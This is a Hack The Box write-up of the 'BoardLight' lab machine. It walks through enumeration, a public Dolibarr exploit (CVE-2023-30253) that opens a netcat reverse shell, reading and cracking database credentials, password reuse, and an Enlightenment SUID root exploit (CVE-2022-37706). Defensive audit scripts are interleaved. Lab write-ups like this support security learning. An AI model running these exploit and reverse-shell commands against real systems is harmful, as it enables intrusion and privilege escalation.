HTB • CTF • BoardLight • Write-Up

Published: at 11:30 AM


INFO

CTF URL: https://app.hackthebox.com/machines/BoardLight

IP: 10.10.11.11

Difficulty: Easy

Reconnaissance

NMAP

nmap -p- --min-rate 10000 10.10.11.11 -v
# 22, 80
nmap -p22,80 -sS -sC -sV 10.10.11.11 -v
# res
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesnt have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

WEB

Added 10.10.11.11 board.htb to /etc/hosts

Some enumeration:

Directories

dirsearch -u http://<ip>/
# result
[05:02:55] 301 -  303B  - /js  ->  http://board.htb/js/                     
[05:03:07] 403 -  274B  - /.ht_wsr.txt                                      
[05:03:07] 403 -  274B  - /.htaccess.bak1
[05:03:07] 403 -  274B  - /.htaccess.orig                                   
[05:03:07] 403 -  274B  - /.htaccess.save
[05:03:07] 403 -  274B  - /.htaccess_sc
[05:03:07] 403 -  274B  - /.htaccess.sample                                 
[05:03:07] 403 -  274B  - /.htaccess_extra
[05:03:07] 403 -  274B  - /.htaccess_orig                                   
[05:03:07] 403 -  274B  - /.htaccessOLD2
[05:03:07] 403 -  274B  - /.htpasswd_test
[05:03:07] 403 -  274B  - /.htaccessBAK                                     
[05:03:07] 403 -  274B  - /.html
[05:03:07] 403 -  274B  - /.htpasswds                                       
[05:03:07] 403 -  274B  - /.httr-oauth
[05:03:07] 403 -  274B  - /.htaccessOLD                                     
[05:03:07] 403 -  274B  - /.htm                                             
[05:03:14] 403 -  274B  - /.php                                             
[05:03:32] 200 -    2KB - /about.php                                        
[05:04:30] 404 -   16B  - /composer.phar                                    
[05:04:35] 200 -    2KB - /contact.php                                      
[05:04:38] 301 -  304B  - /css  ->  http://board.htb/css/                   
[05:05:03] 403 -  274B  - /images/                                          
[05:05:03] 301 -  307B  - /images  ->  http://board.htb/images/             
[05:05:10] 403 -  274B  - /js/                                              
[05:05:37] 404 -   16B  - /php-cs-fixer.phar                                
[05:05:38] 403 -  274B  - /php5.fcgi                                        
[05:05:43] 404 -   16B  - /phpunit.phar                                     
[05:05:58] 403 -  274B  - /server-status/                                   
[05:05:58] 403 -  274B  - /server-status
dirsearch -w /usr/share/wordlists/dirb/big.txt -u http://board.htb
[05:08:35] 301 -  304B  - /css  ->  http://board.htb/css/                    
[05:08:52] 301 -  307B  - /images  ->  http://board.htb/images/              
[05:08:56] 301 -  303B  - /js  ->  http://board.htb/js/                      
[05:09:23] 403 -  274B  - /server-status       

Requesting a page that does not exist, such as nonexistingpage.php, gives a different error, so PHP files are fuzzed separately with a .php suffix:


dirsearch -w /usr/share/wordlists/dirb/big.txt -u http://board.htb -t 200 --suffixes '.php'
[05:12:14] 403 -  274B  - /.htaccess.php                                    
[05:12:14] 403 -  274B  - /.htpasswd.php                                    
[05:12:20] 200 -    2KB - /about.php                                        
[05:12:33] 200 -    2KB - /contact.php                                      
[05:12:36] 200 -    2KB - /do.php  

Subdomain fuzzing

gobuster vhost -u board.htb -w /usr/share/wordlists/dirb/common.txt --append-domain -k
...
Found: crm.board.htb Status: 200 [Size: 6360]
...

Added crm.board.htb to /etc/hosts

WEB - CRM

The CRM is Dolibarr 17.0.0, for which a public exploit for CVE-2023-30253 exists. Run with the admin/admin credentials and a listener on 10.10.14.43:1234, it returns a reverse shell as www-data:

git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git
cd Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
python3 exploit.py http://crm.board.htb admin admin 10.10.14.43 1234
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.11.11] 52108
bash: cannot set terminal process group (891): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ whoami
whoami
www-data

Shell stabilization

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# ctrl+z
stty raw -echo; fg

PrivEsc to User

Enum

A user larissa exists:

ls -la /home
drwxr-x--- 16 larissa larissa 4096 Jul 24 00:20 larissa

SUID binaries:

/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper

None of these is usable as www-data, but enlightenment_sys will be used later.
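From the defender's side, a list like the one above is only useful against a baseline: a minimal server has a known set of setuid helpers, and desktop components such as the Enlightenment utilities stand out immediately. The script below is an added example, not the write-up's code. SAMPLE_FIND is the write-up's own find output embedded as sample input, and BASELINE is a hypothetical allowlist of setuid binaries a stock Ubuntu server is expected to ship; anything outside it is reported for review together with a chmod command that drops the setuid bit.

```python
"""Flag SUID binaries that fall outside an expected baseline.

Added example (not the write-up's code). SAMPLE_FIND is the write-up's own
`find / -perm -4000` output, embedded as sample input. BASELINE is a
hypothetical allowlist; tune it to the host's real package set.
"""
import os
import stat

SAMPLE_FIND = """\
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
"""

# Hypothetical allowlist: core setuid helpers from shadow, util-linux, sudo,
# openssh, dbus and eject. Anything else on a server deserves a second look.
BASELINE = frozenset({
    "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/fusermount",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
})


def parse_find_output(text):
    """Turn raw `find` output into a list of absolute paths, ignoring noise lines."""
    return [ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")]


def find_suid(root="/"):
    """Live equivalent of `find / -perm -4000`: walk root and lstat every file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; skip rather than abort
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


def unexpected_suid(paths, baseline=BASELINE):
    """Return the SUID paths not covered by the baseline, sorted."""
    return sorted(set(paths) - set(baseline))


def remediation(paths):
    """Suggested hardening for each unexpected binary: strip the setuid bit.

    Commands are returned as strings for review; nothing is executed here.
    """
    return [f"chmod u-s {p}" for p in paths]


if __name__ == "__main__":
    extra = unexpected_suid(parse_find_output(SAMPLE_FIND))
    for p in extra:
        print("REVIEW: ", p)
    for cmd in remediation(extra):
        print("SUGGEST:", cmd)
```

On a headless server the cleaner fix is to remove the desktop packages that drag in Xorg.wrap and the Enlightenment helpers rather than to chmod them one by one; the chmod list is meant as a stop-gap for review. find_suid() can replace the embedded sample to audit the machine the script runs on.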

Listening ports (MySQL is bound to localhost only):

ss -tulpn
Netid  State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port Process 
udp    UNCONN  0       0        127.0.0.53%lo:53           0.0.0.0:*            
udp    UNCONN  0       0              0.0.0.0:68           0.0.0.0:*            
udp    UNCONN  0       0              0.0.0.0:5353         0.0.0.0:*            
udp    UNCONN  0       0              0.0.0.0:58735        0.0.0.0:*            
udp    UNCONN  0       0                 [::]:5353            [::]:*            
udp    UNCONN  0       0                 [::]:56910           [::]:*            
tcp    LISTEN  0       70           127.0.0.1:33060        0.0.0.0:*            
tcp    LISTEN  0       151          127.0.0.1:3306         0.0.0.0:*            
tcp    LISTEN  0       4096     127.0.0.53%lo:53           0.0.0.0:*            
tcp    LISTEN  0       128            0.0.0.0:22           0.0.0.0:*            
tcp    LISTEN  0       511                  *:80                 *:*  
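The ss output is worth reading as an exposure map: MySQL (3306 and 33060) and the stub resolver listen on loopback only, so they are reachable solely by a local process such as the compromised web shell, while SSH, Apache and a few UDP services are bound to wildcard addresses. The script below is an added example, not the write-up's code; SAMPLE_SS is the write-up's own ss listing embedded as sample input, and the classification is done with the standard ipaddress module.

```python
"""Classify listening sockets from `ss -tulpn` output by network exposure.

Added example (not from the write-up). SAMPLE_SS is the write-up's own ss
listing, embedded as sample input.
"""
import ipaddress

SAMPLE_SS = """\
Netid  State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port Process
udp    UNCONN  0       0        127.0.0.53%lo:53           0.0.0.0:*
udp    UNCONN  0       0              0.0.0.0:68           0.0.0.0:*
udp    UNCONN  0       0              0.0.0.0:5353         0.0.0.0:*
udp    UNCONN  0       0              0.0.0.0:58735        0.0.0.0:*
udp    UNCONN  0       0                 [::]:5353            [::]:*
udp    UNCONN  0       0                 [::]:56910           [::]:*
tcp    LISTEN  0       70           127.0.0.1:33060        0.0.0.0:*
tcp    LISTEN  0       151          127.0.0.1:3306         0.0.0.0:*
tcp    LISTEN  0       4096     127.0.0.53%lo:53           0.0.0.0:*
tcp    LISTEN  0       128            0.0.0.0:22           0.0.0.0:*
tcp    LISTEN  0       511                  *:80                 *:*
"""


def split_local(local):
    """Split ss's 'addr:port' column; handles '[::]:5353' and '127.0.0.53%lo:53'."""
    host, _, port = local.rpartition(":")
    host = host.strip("[]").split("%", 1)[0]  # drop IPv6 brackets and scope id
    return host, int(port)


def exposure(host):
    """'loopback' if only local processes can reach it, 'exposed' for wildcard binds."""
    if host == "*":
        return "exposed"
    ip = ipaddress.ip_address(host)
    if ip.is_loopback:
        return "loopback"
    if ip.is_unspecified:  # 0.0.0.0 or ::
        return "exposed"
    return "specific"  # bound to one interface address


def parse_ss(text):
    """Parse `ss -tulpn` output into rows of (proto, port, host, exposure)."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] == "Netid":
            continue  # header or malformed line
        proto, _state, _recvq, _sendq, local = parts[:5]
        host, port = split_local(local)
        rows.append((proto, port, host, exposure(host)))
    return rows


def ports_with_exposure(text, kind):
    """Distinct (proto, port) pairs in the given exposure class, sorted."""
    return sorted({(p, port) for p, port, _h, e in parse_ss(text) if e == kind})


if __name__ == "__main__":
    for kind in ("exposed", "loopback", "specific"):
        print(kind, ports_with_exposure(SAMPLE_SS, kind))
```

Run against live output (`ss -tulpn | python3 audit_ss.py` with a small stdin wrapper) the same parser gives a quick diff between what the host exposes and what the firewall rules or the service's bind-address setting are believed to allow.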

Web configuration files

find ./ -name conf*
# ...
./htdocs/conf/conf.php.old
./htdocs/conf/conf.php.example
./htdocs/conf/conf.php
# ...

MySQL credentials found

www-data@boardlight:~/html/crm.board.htb$ cat ./htdocs/conf/conf.php | grep -i user -A 2 -B 2
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
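Two things in the last two listings matter to a defender: the live conf.php carries a plaintext database password that the web server account can read, and a leftover conf.php.old sits beside it, typically with looser permissions than the file the installer locked down. The script below is an added example, not the write-up's or Dolibarr's code. It reports credential-like PHP assignments with the value masked, flags stale copies of the live config, and notes which files other users can read. build_demo_tree() constructs a temporary web root from the write-up's find output and conf.php excerpt so the audit runs offline.

```python
"""Audit a web root for credential-bearing PHP config files and stale copies.

Added example (not from the write-up). The demo tree is constructed from the
write-up's find output and conf.php excerpt.
"""
import os
import re
import stat
import tempfile

# PHP assignments whose variable name hints at a credential.
CRED_RE = re.compile(
    r"^\s*\$(\w*(?:pass|secret|token|api_key)\w*)\s*=\s*['\"](.*?)['\"]\s*;",
    re.IGNORECASE | re.MULTILINE,
)
# Suffixes editors and admins leave behind when copying a live config.
BACKUP_SUFFIXES = (".old", ".bak", ".orig", ".save", ".swp", "~")

# Constructed from the write-up's grep of conf.php.
CONF_PHP = """\
<?php
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
"""


def mask(value):
    """Keep the first two characters so a finding can be matched to its source."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "*" * len(value)


def find_credentials(php_text):
    """Return [(variable, masked_value)] for credential-like assignments."""
    return [(m.group(1), mask(m.group(2))) for m in CRED_RE.finditer(php_text)]


def is_stale_copy(name, live="conf.php"):
    """conf.php.old, conf.php.bak, ... but not the live file or the shipped .example."""
    return name != live and name.startswith(live) and name.endswith(BACKUP_SUFFIXES)


def others_can_read(path):
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_tree(root):
    """Walk root and return credentials per file, stale copies and world-readable configs."""
    report = {"credentials": {}, "stale": [], "readable": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if is_stale_copy(name):
                report["stale"].append(path)
            if name.startswith("conf.php") and not name.endswith(".example"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    creds = find_credentials(fh.read())
                if creds:
                    report["credentials"][path] = creds
                if others_can_read(path):
                    report["readable"].append(path)
    return report


def build_demo_tree():
    """Temp web root mirroring the write-up: conf.php (0640), conf.php.old (0644), conf.php.example."""
    root = tempfile.mkdtemp(prefix="boardlight-demo-")
    conf_dir = os.path.join(root, "htdocs", "conf")
    os.makedirs(conf_dir)
    files = (
        (os.path.join(conf_dir, "conf.php"), CONF_PHP, 0o640),
        (os.path.join(conf_dir, "conf.php.old"), CONF_PHP, 0o644),
        (os.path.join(conf_dir, "conf.php.example"), "<?php\n$dolibarr_main_db_pass='';\n", 0o644),
    )
    for path, text, mode in files:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for key, value in audit_tree(demo).items():
        print(key, value)
```

Pointed at a real web root instead of the demo tree, the same audit is a cheap pre-deployment check: a stale copy that still holds a working password defeats whatever permissions were set on the live file, and even a correctly permissioned conf.php is readable by the web server account, so the database credential should be treated as compromised once that account is.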

MySQL (not useful by itself)

mysql -h localhost -u dolibarrowner -p
Enter password: # serverfun2$2023!!
# success!
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| dolibarr           |
| information_schema |
| performance_schema |
+--------------------+

mysql> use dolibarr;
mysql> show tables;
...
| llx_user                                                    |
...
mysql> select pass_crypted,lastname,api_key from llx_user;
+--------------------------------------------------------------+------------+--------------+
| pass_crypted                                                 | lastname   | api_key      |
+--------------------------------------------------------------+------------+--------------+
| $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm | SuperAdmin | NULL         |
| $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 | admin      | yr6V3pXd9QEI |
+--------------------------------------------------------------+------------+--------------+

Let's crack them.

hashes.txt

$2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm
$2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Result:

user        password
admin       admin
SuperAdmin  -

The SuperAdmin hash could not be cracked.

Password reuse

su larissa
# serverfun2$2023!!

Reuse of the DB password worked!

user.txt

cat user.txt 
24e31e7f12f72093ab439a1e6764e4ef

PrivEsc to root

SUID

find / -perm -4000 2>/dev/null
...
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
...
larissa@boardlight:~$ bash exploit.sh 
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# 
# 
# whoami
root

root.txt

cat /root/root.txt
062b930711530626c7a1ee00763f50d5

The SUID exploit does not work as www-data:

www-data@boardlight:/tmp$ bash exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
exploit.sh: line 20: /tmp/exploit: Permission denied
chmod: changing permissions of '/tmp/exploit': Operation not permitted
[+] Enjoy the root shell :)
ERROR: ACTION NOT ALLOWED: /bin/mount

Result